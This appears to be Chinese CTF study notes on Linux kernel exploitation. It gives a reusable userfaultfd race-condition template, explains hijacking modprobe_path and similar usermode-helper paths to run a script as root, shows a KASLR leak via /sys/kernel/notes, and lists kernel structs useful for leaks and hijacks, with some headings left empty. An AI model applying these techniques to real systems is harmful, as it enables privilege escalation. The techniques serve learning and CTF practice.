启动 monitor 轮询线程,整个 userfaultfd 的启动流程就结束了,接下来便是等待缺页异常的过程
1 2 3 4 5 /* Create a thread that will process the userfaultfd events */ int s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd); if (s != 0) { errExit("pthread_create"); }
monitor 轮询线程应当定义为如下形式,这里给出的是 UFFDIO_COPY 的用法,即将自定义数据拷贝到 faulting page 上:
static int page_size;

/*
 * userfaultfd monitor thread. `arg` carries the userfaultfd descriptor.
 * Waits for page-fault events on it and resolves each one by copying a page
 * filled with a single letter ('A' + fault count % 20) over the faulting page.
 * Never returns; any failure terminates the process.
 */
static void *fault_handler_thread(void *arg)
{
    static struct uffd_msg msg;   /* event read from the userfaultfd */
    static int fault_cnt = 0;     /* number of faults handled so far */
    static char *page = NULL;     /* source page for UFFDIO_COPY */
    struct uffdio_copy uffdio_copy;
    long uffd = (long) arg;

    page_size = sysconf(_SC_PAGE_SIZE);

    /* Allocate the source page once, on first entry. */
    if (!page) {
        page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED)
            errExit("mmap");
    }

    while (1) {
        struct pollfd pfd = { .fd = uffd, .events = POLLIN };

        /* Block until the userfaultfd has an event for us. */
        int ready = poll(&pfd, 1, -1);
        if (ready == -1)
            errExit("poll");

        printf("\nfault_handler_thread():\n");
        printf(" poll() returns: nready = %d; "
               "POLLIN = %d; POLLERR = %d\n",
               ready,
               (pfd.revents & POLLIN) != 0,
               (pfd.revents & POLLERR) != 0);

        ssize_t got = read(uffd, &msg, sizeof(msg));
        switch (got) {
        case 0:
            printf("EOF on userfaultfd!\n");
            exit(EXIT_FAILURE);
        case -1:
            errExit("read");
        default:
            break;
        }

        /* Only page-fault events are expected here. */
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            fprintf(stderr, "Unexpected event on userfaultfd\n");
            exit(EXIT_FAILURE);
        }

        printf(" UFFD_EVENT_PAGEFAULT event: ");
        printf("flags = %llx; ", msg.arg.pagefault.flags);
        printf("address = %llx\n", msg.arg.pagefault.address);

        /* Fill the source page with a letter that changes on every fault. */
        memset(page, 'A' + fault_cnt++ % 20, page_size);

        uffdio_copy.src = (unsigned long) page;
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            errExit("ioctl-UFFDIO_COPY");

        printf("(uffdio_copy.copy returned %lld)\n", uffdio_copy.copy);
    }
}
有人可能注意到了 uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1); 这个奇怪的句子,在这里作用是将触发缺页异常的地址按页对齐 作为后续拷贝的起始地址
比如说触发的地址可能是 0xdeadbeef,直接从这里开始拷贝一整页的数据就拷歪了,应当从 0xdeadb000 开始拷贝(假设页大小 0x1000)
例程
测试例程如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 #include <sys/types.h> #include <stdio.h> #include <linux/userfaultfd.h> #include <pthread.h> #include <errno.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <poll.h> #include <string.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/ioctl.h> #include <poll.h> static int page_size;void errExit (char * msg) { printf ("[x] Error at: %s\n" , msg); exit (-1 ); } static void *fault_handler_thread (void *arg) { static struct uffd_msg msg ; static int fault_cnt = 0 ; long uffd; static char *page = NULL ; struct uffdio_copy uffdio_copy ; ssize_t nread; uffd = (long ) arg; if (page == NULL ) { page = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); if (page == MAP_FAILED) errExit("mmap" ); } for (;;) { struct pollfd pollfd ; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1 , -1 ); if (nready == -1 ) errExit("poll" ); printf ("\nfault_handler_thread():\n" ); printf (" poll() returns: nready = %d; " "POLLIN = %d; POLLERR = %d\n" , nready, (pollfd.revents & POLLIN) != 0 , (pollfd.revents & POLLERR) != 0 ); nread = read(uffd, &msg, sizeof (msg)); if (nread == 0 ) { printf ("EOF on userfaultfd!\n" ); exit (EXIT_FAILURE); } if (nread == -1 ) errExit("read" ); if (msg.event != UFFD_EVENT_PAGEFAULT) { fprintf (stderr , "Unexpected event on userfaultfd\n" ); exit (EXIT_FAILURE); } printf (" 
UFFD_EVENT_PAGEFAULT event: " ); printf ("flags = %llx; " , msg.arg.pagefault.flags); printf ("address = %llx\n" , msg.arg.pagefault.address); memset (page, 'A' + fault_cnt % 20 , page_size); fault_cnt++; uffdio_copy.src = (unsigned long ) page; uffdio_copy.dst = (unsigned long ) msg.arg.pagefault.address & ~(page_size - 1 ); uffdio_copy.len = page_size; uffdio_copy.mode = 0 ; uffdio_copy.copy = 0 ; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1 ) errExit("ioctl-UFFDIO_COPY" ); printf (" (uffdio_copy.copy returned %lld)\n" , uffdio_copy.copy); } } int main (int argc, char ** argv, char ** envp) { long uffd; char *addr; unsigned long len; pthread_t thr; struct uffdio_api uffdio_api ; struct uffdio_register uffdio_register ; page_size = sysconf(_SC_PAGE_SIZE); uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd == -1 ) errExit("userfaultfd" ); uffdio_api.api = UFFD_API; uffdio_api.features = 0 ; if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1 ) errExit("ioctl-UFFDIO_API" ); len = 0x1000 ; addr = (char *) mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); if (addr == MAP_FAILED) errExit("mmap" ); uffdio_register.range.start = (unsigned long ) addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1 ) errExit("ioctl-UFFDIO_REGISTER" ); int s = pthread_create(&thr, NULL , fault_handler_thread, (void *) uffd); if (s != 0 ) errExit("pthread_create" ); void * ptr = (void *) *(unsigned long long *) addr; printf ("Get data: %p\n" , ptr); return 0 ; }
起个虚拟机跑一下,我们可以看到在我们监视的匿名页内成功地被我们写入了想要的数据
新版本内核对抗 需要说明的是,自从 5.11 版本起内核 fs/userfaultfd.c 中全局变量 sysctl_unprivileged_userfaultfd 不再被初始化为 1(默认值变为 0),这意味着默认情况下只有特权进程(root,更准确地说是拥有 CAP_SYS_PTRACE 权限的进程)才能使用 userfaultfd 处理内核态触发的缺页异常。
这是因为在较新版本的内核中修改了变量 sysctl_unprivileged_userfaultfd 的值:
来自 linux-5.11 源码fs/userfaultfd.c:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 int sysctl_unprivileged_userfaultfd __read_mostly;SYSCALL_DEFINE1(userfaultfd, int , flags) { struct userfaultfd_ctx *ctx ; int fd; if (!sysctl_unprivileged_userfaultfd && (flags & UFFD_USER_MODE_ONLY) == 0 && !capable(CAP_SYS_PTRACE)) { printk_once(KERN_WARNING "uffd: Set unprivileged_userfaultfd " "sysctl knob to 1 if kernel faults must be handled " "without obtaining CAP_SYS_PTRACE capability\n" ); return -EPERM; }
来自 linux-5.4 源码fs/userfaultfd.c:
1 2 int sysctl_unprivileged_userfaultfd __read_mostly = 1 ;
在之前的版本当中 sysctl_unprivileged_userfaultfd 这一变量被初始化为 1,而在较新版本的内核当中这一变量并没有被赋予初始值,编译器会将其放在 bss 段,默认值为 0
这意味着在较新版本内核中只有 root 权限才能使用 userfaultfd ,这或许意味着刚刚进入大众视野的 userfaultfd 可能又将逐渐淡出大众视野,但不可否认的是,userfaultfd 确乎为我们在 Linux kernel 中的条件竞争利用提供了一个全新的思路与一种极其稳定的利用手法。
CTF 中的 userfaultfd 板子 userfaultfd 的整个操作流程比较繁琐,故笔者现给出如下板子:
/* Headers this template needs (harmless if the file already includes them). */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

static pthread_t monitor_thread;

/* Print `msg` as an error location and terminate the process. */
void errExit(char *msg)
{
    printf("[x] Error at: %s\n", msg);
    exit(EXIT_FAILURE);
}

/*
 * Create a userfaultfd, register [addr, addr + len) for missing-page faults
 * and start `handler` as the monitor thread.
 *
 * addr/len: page-aligned range to watch (e.g. a fresh anonymous mmap).
 * handler:  pthread entry point; it receives the userfaultfd descriptor cast
 *           to void *. It has the pthread start-routine type
 *           (void *(*)(void *)) so that a handler such as
 *           `static void *fault_handler_thread(void *arg)` can be passed
 *           directly to pthread_create() without a pointer-type mismatch.
 *
 * Exits the process on any failure.
 */
void registerUserFaultFd(void *addr, unsigned long len, void *(*handler)(void *))
{
    long uffd;
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    int s;

    /* Create the userfaultfd object and negotiate the API version. */
    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1)
        errExit("userfaultfd");

    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
        errExit("ioctl-UFFDIO_API");

    /* Track pages of the range that have not been faulted in yet. */
    uffdio_register.range.start = (unsigned long) addr;
    uffdio_register.range.len = len;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
        errExit("ioctl-UFFDIO_REGISTER");

    s = pthread_create(&monitor_thread, NULL, handler, (void *) uffd);
    if (s != 0)
        errExit("pthread_create");
}
在使用时直接调用即可:
1 registerUserFaultFd(addr, len, handler);
需要注意的是 handler 的写法,这里直接照抄 Linux man page 改了改,可以根据个人需求进行个性化改动:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 static char *page = NULL ; static long page_size;static void *fault_handler_thread (void *arg) { static struct uffd_msg msg ; static int fault_cnt = 0 ; long uffd; struct uffdio_copy uffdio_copy ; ssize_t nread; uffd = (long ) arg; for (;;) { struct pollfd pollfd ; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1 , -1 ); if (nready == -1 ) errExit("poll" ); nread = read(uffd, &msg, sizeof (msg)); if (nread == 0 ) errExit("EOF on userfaultfd!\n" ); if (nread == -1 ) errExit("read" ); if (msg.event != UFFD_EVENT_PAGEFAULT) errExit("Unexpected event on userfaultfd\n" ); uffdio_copy.src = (unsigned long ) page; uffdio_copy.dst = (unsigned long ) msg.arg.pagefault.address & ~(page_size - 1 ); uffdio_copy.len = page_size; uffdio_copy.mode = 0 ; uffdio_copy.copy = 0 ; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1 ) errExit("ioctl-UFFDIO_COPY" ); } }
setxattr + userfaultfd FUSE race punch hole 利用思路 exp Kernel Trick 修改符号链接
与modprobe_path类似,还有core_pattern,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 static void validate_coredump_safety (void ) { #ifdef CONFIG_COREDUMP if (suid_dumpable == SUID_DUMP_ROOT && core_pattern[0 ] != '/' && core_pattern[0 ] != '|' ) { printk(KERN_WARNING "Unsafe core_pattern used with fs.suid_dumpable=2.\n" "Pipe handler or fully qualified core dump path required.\n" "Set kernel.core_pattern before fs.suid_dumpable.\n" ); } #endif }
poweroff_cmd,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 __int64 poweroff_work_func () { char v0; __int64 result; _fentry__(); v0 = poweroff_force; result = run_cmd(poweroff_cmd); if ( (_DWORD)result ) { if ( v0 ) { printk(&unk_FFFFFFFF81CB2888); emergency_sync(); return kernel_power_off(); } } return result; }
uevent_helper,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 __int64 uevent_helper_store () { __int64 v0; __int64 v1; __int64 v2; __int64 v3; _fentry__(); if ( (unsigned __int64)(v1 + 1 ) > 0x100 ) return -2LL ; v2 = v1; v3 = memcpy (uevent_helper, v0, v1); uevent_helper[v2] = 0 ; if ( !v2 || *(_BYTE *)(v3 + v2 - 1 ) != 10 ) return v2; *(_BYTE *)(v3 + v2 - 1 ) = 0 ; return v2; }
等也可以被修改。
当内核开启了 CONFIG_STATIC_USERMODEHELPER=y(此时 usermode helper 的路径被固定为 CONFIG_STATIC_USERMODEHELPER_PATH 所指定的值)后,无法使用这些方法。
当能够任意地址分配的时候,与 glibc 改 hook 类似,在内核中通常修改的是 modprobe_path 。modprobe_path 是内核中的一个变量,其值为 /sbin/modprobe ,因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。
当我们尝试去执行(execve)一个非法的文件(file magic not found),内核会经历如下调用链:
1 2 3 4 5 6 7 8 9 entry_SYSCALL_64() sys_execve() do_execve() do_execveat_common() bprm_execve() exec_binprm() search_binary_handler() __request_module() call_modprobe()
其中 call_modprobe() 定义于 kernel/kmod.c,我们主要关注这部分代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 static int call_modprobe (char *module_name, int wait) { argv[0 ] = modprobe_path; argv[1 ] = "-q" ; argv[2 ] = "--" ; argv[3 ] = module_name; argv[4 ] = NULL ; info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL, NULL , free_modprobe_argv, NULL ); if (!info) goto free_module_name; return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。 我们不难想到的是:若是我们能够劫持 modprobe_path,将其改写为我们指定的恶意脚本的路径,随后我们再执行一个非法文件,内核将会以 root 权限执行我们的恶意脚本。
或者分析vmlinux即可(对于一些没有call_modprobe()符号的直接交叉引用即可)。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 __int64 _request_module( char a1, __int64 a2, double a3, double a4, double a5, double a6, double a7, double a8, double a9, double a10, ...) { ...... if ( v19 ) { ...... v21 = call_usermodehelper_setup( (__int64)&byte_FFFFFFFF82444700, (__int64)v18, (__int64)&off_FFFFFFFF82444620, 3264 , 0LL , (__int64)free_modprobe_argv, 0LL ); ...... } .data:FFFFFFFF82444700 byte_FFFFFFFF82444700 ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r .data:FFFFFFFF82444700 db 2F h ; / ; __request_module+14B ↑o ... .data:FFFFFFFF82444701 db 73 h ; s .data:FFFFFFFF82444702 db 62 h ; b .data:FFFFFFFF82444703 db 69 h ; i .data:FFFFFFFF82444704 db 6 Eh ; n .data:FFFFFFFF82444705 db 2F h ; / .data:FFFFFFFF82444706 db 6 Dh ; m .data:FFFFFFFF82444707 db 6F h ; o .data:FFFFFFFF82444708 db 64 h ; d .data:FFFFFFFF82444709 db 70 h ; p .data:FFFFFFFF8244470A db 72 h ; r .data:FFFFFFFF8244470B db 6F h ; o .data:FFFFFFFF8244470C db 62 h ; b .data:FFFFFFFF8244470D db 65 h ; e .data:FFFFFFFF8244470E db 0
从内存搜索 flag 从 /sys/kernel/notes 泄露内核地址 /sys/kernel/notes 的内容是当前运行的 vmlinux 镜像的 .notes 节,里面存有内核函数 hypercall_page 的地址。此信息可用于绕过 KASLR 保护。
对于 OLK-6.6 的 x86 内核,若编译时开启了 CONFIG_XEN 选项,则 arch/x86/xen/xen-head.S 会将汇编函数 hypercall_page 加入到 vmlinux 镜像的 .note.Xen 节:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 #ifdef CONFIG_XEN SYM_CODE_START(hypercall_page) ... SYM_CODE_END(hypercall_page) ELFNOTE(Xen, XEN_ELFNOTE_HYPERCALL_PAGE, _ASM_PTR hypercall_page) #endif
链接脚本 arch/x86/kernel/vmlinux.lds.S 中指出,vmlinux 的 .notes 节由各链接文件的 .note.* 节组合形成:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 SECTIONS { .text : ... { ... } RO_DATA(PAGE_SIZE) --(expand)--> NOTES --(expand)--> .notes : ... { BOUNDED_SECTION_BY(.note.*, _notes) } .data : ... { ... } }
在链接生成可执行的 vmlinux 时,arch/x86/Makefile 指定了链接器选项 --emit-relocs:
1 2 3 4 5 ifdef CONFIG_X86_NEED_RELOCSLDFLAGS_vmlinux := --emit-relocs --discard-none else LDFLAGS_vmlinux := endif
该选项为 vmlinux 中所有涉及重定位(Relocation) 的节生成对应的 .rela.* 节。由于 .notes 节带有 hypercall_page,而后者是一个全局符号涉及重定位,因此会生成 .rela.notes 节。注意 .rela.notes 的 sh_info 字段(即下方的 Inf 列)的值为 22,正是 .notes 节的序号。
1 2 3 4 5 $ readelf -SW vmlinux [Nr] Name Type Address Off Size ES Flg Lk Inf Al ... [22] .notes NOTE ffffffff8255a2fc 175a2fc 0000f0 00 A 0 0 4 [23] .rela.notes RELA 0000000000000000 18571990 000018 18 I 81 22 8
“链接后”阶段
vmlinux 完成链接并生成后,arch/x86/Makefile.postlink 会被触发。此文件的开头注释解释了这一阶段(Pass) 的工作:
Separate relocations from vmlinux into vmlinux.relocs.
Strip relocations from vmlinux.
具体体现为该文件中 $(call cmd,relocs) 和 $(call cmd,strip_relocs) 两个过程:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 CMD_RELOCS = arch/x86/tools/relocs OUT_RELOCS = arch/x86/boot/compressed quiet_cmd_relocs = RELOCS $(OUT_RELOCS) /$@ .relocs cmd_relocs = \ mkdir -p $(OUT_RELOCS) ; \ $(CMD_RELOCS) $@ > $(OUT_RELOCS) /$@ .relocs; \ $(CMD_RELOCS) --abs-relocs $@ quiet_cmd_strip_relocs = RSTRIP $@ cmd_strip_relocs = \ $(OBJCOPY) --remove-section='.rel.*' --remove-section='.rel__*' \ --remove-section='.rela.*' --remove-section='.rela__*' $@ vmlinux: FORCE @true ifeq ($(CONFIG_X86_NEED_RELOCS) ,y) $(call cmd,relocs) $(call cmd,strip_relocs) endif
重点关注 relocs 过程,将 cmd_relocs 中的 Makefile 语句展开后得到如下 Bash 命令:
1 2 3 mkdir -p arch /x86/boot/compressedarch /x86/tools/relocs vmlinux > arch /x86/boot/compressed/vmlinux.relocsarch /x86/tools/relocs --abs-relocs vmlinux
通过解读 arch/x86/tools/relocs 工具的源码,其实质是按照 ELF 格式解析 vmlinux,通过节头表(Section Header)遍历所有的节,找到其中的 .rela 节并从 r_offset 中获取所有需要被重定位修改的代码地址 ,将这些地址罗列成一个列表 relocs64,并最终将其输出形成 vmlinux.relocs。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 static int do_reloc64 (..., Elf_Rel *rel, ...) { unsigned r_type = ELF64_R_TYPE(rel->r_info); ElfW(Addr) offset = rel->r_offset; switch (r_type) { case R_X86_64_64: add_reloc(&relocs64, offset); break ; } } static void emit_relocs (int as_text, int use_real_mode) { do_reloc = do_reloc64; walk_relocs(do_reloc); sort_relocs(&relocs64); for (i = 0 ; i < relocs64.count; i++) write_reloc(relocs64.offset[i], stdout ); }
随后,根据 arch/x86/boot/compressed/Makefile,将 vmlinux.bin 与 vmlinux.relocs 前后拼接在一起形成 vmlinux.bin.all,并最终经过压缩形成内核镜像产物。
1 2 3 4 5 6 vmlinux.bin.all-y := $(obj) /vmlinux.bin vmlinux.bin.all-$(CONFIG_X86_NEED_RELOCS) += $(obj) /vmlinux.relocs
实践验证方式
可以通过编译一个简单的 C 程序,来了解重定位节的内容。
1 2 3 4 5 6 7 8 9 10 echo "int main() { return 0; }" | gcc -x c - -Wl,--emit-relocs -greadelf -r ./a.out
内核启动阶段
在完成建立早期页表、进入 64 位模式等一系列工作后,执行流转入内核镜像自带的解压器,开始执行解压内核的工作,即 arch/x86/boot/compressed/misc.c 中的 extract_kernel()。此过程涉及内核地址随机化(KASLR):
1 2 3 4 5 6 7 8 9 10 11 12 extract_kernel() choose_random_location(input_data, input_len, &output, ..., &virt_addr) random_addr = find_random_phys_addr(min_addr, output_size); *output = random_addr; random_addr = find_random_virt_addr(LOAD_PHYSICAL_ADDR, output_size); *virt_addr = random_addr; entry_offset = decompress_kernel(outbuf:output, virt_addr, ...) __decompress(input_data, input_len, ..., outbuf, output_len, ...) handle_relocations(outbuf, output_len, virt_addr)
KASLR 的本质是整体内核镜像的随机偏移。可以看到,choose_random_location() 选定的物理地址空间偏移量和虚拟地址空间偏移量分别体现在 output 和 virt_addr 两个地址上。__decompress() 将内核解压缩至 output 地址,此时 output 上承载的就是上文提到的 vmlinux.bin.all。随后 handle_relocations() 开始解析 vmlinux.bin.all,从中找到 vmlinux.relocs,并结合这些重定位信息以及随机偏移,对内核镜像中各个需要重定位的位置实施修改。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 void handle_relocations (void *output, unsigned long output_len, unsigned long virt_addr) { ... for (reloc = output + output_len - sizeof (*reloc); *reloc; reloc--) { ... } #ifdef CONFIG_X86_64 while (*--reloc) { ... } for (reloc--; *reloc; reloc--) { ... } #endif }
注意:此刻解压缩器应该已经在使用虚拟地址,并且(早期)页表已有建立,但这个页表应该实现的是 VA-PA 完全一致的映射,即 VA 的值完全等于 PA。而 .rela.* 节中记录的是内核加载的虚拟地址。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 SECTIONS { . = __START_KERNEL; .text : ... { ... } ... } #define LOAD_PHYSICAL_ADDR ((CONFIG_PHYSICAL_START ... #define __START_KERNEL (__START_KERNEL_map + LOAD_PHYSICAL_ADDR) #define __START_KERNEL_map _AC(0xffffffff80000000, UL)
因此有了 map 这个变量,作用于 extended 上。这个 extended 是(由 .rela.* 记录的)内核镜像中引用了某个全局符号的位置,本应属于内核编译时地址 ,但由于有链接器脚本,该地址等价于内核加载虚拟地址 。由于此刻正在(通过 self map)使用物理地址,因此通过 map 将其转变为带偏移的内核加载物理地址 。
最后再对这些内核镜像位置实施修改,添加运行时虚拟地址 的随机偏移量。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 void handle_relocations (void *output, unsigned long output_len, unsigned long virt_addr) { unsigned long delta, map , ptr; unsigned long min_addr = (unsigned long )output; delta = min_addr - LOAD_PHYSICAL_ADDR; map = delta - __START_KERNEL_map; if (IS_ENABLED(CONFIG_X86_64)) delta = virt_addr - LOAD_PHYSICAL_ADDR; ... for (reloc--; *reloc; reloc--) { long extended = *reloc; extended += map ; ptr = (unsigned long )extended; if (ptr < min_addr || ptr > max_addr) error("64-bit relocation outside of kernel!\n" ); *(uint64_t *)ptr += delta; } }
常见结构体的利用
结构体/能力
控制流劫持
泄露堆
泄露栈
泄露内核地址
结构体大小
cred
×
√
×
×
0xa8 (kmalloc-192)
tty_struct
√
√
×
√
0x2e0 (kmalloc-1024)
seq_operations
√
×
×
√
0x20 (kmalloc-32)
subprocess_info
√
√
×
√
0x60 (kmalloc-128)
pipe_buffer
√
×
×
√
0x280 (kmalloc-1024)
shm_file_data
×
√
×
√
0x20 (kmalloc-32)
msg_msg
×
√
×
×
0x31~0x1000 (>= kmalloc-64)
timerfd_ctx
×
√
×
√
0xf0 (kmalloc-256)
system V 消息队列 pipe 管道相关 io_uring 与异步 IO 相关 msg_msg poll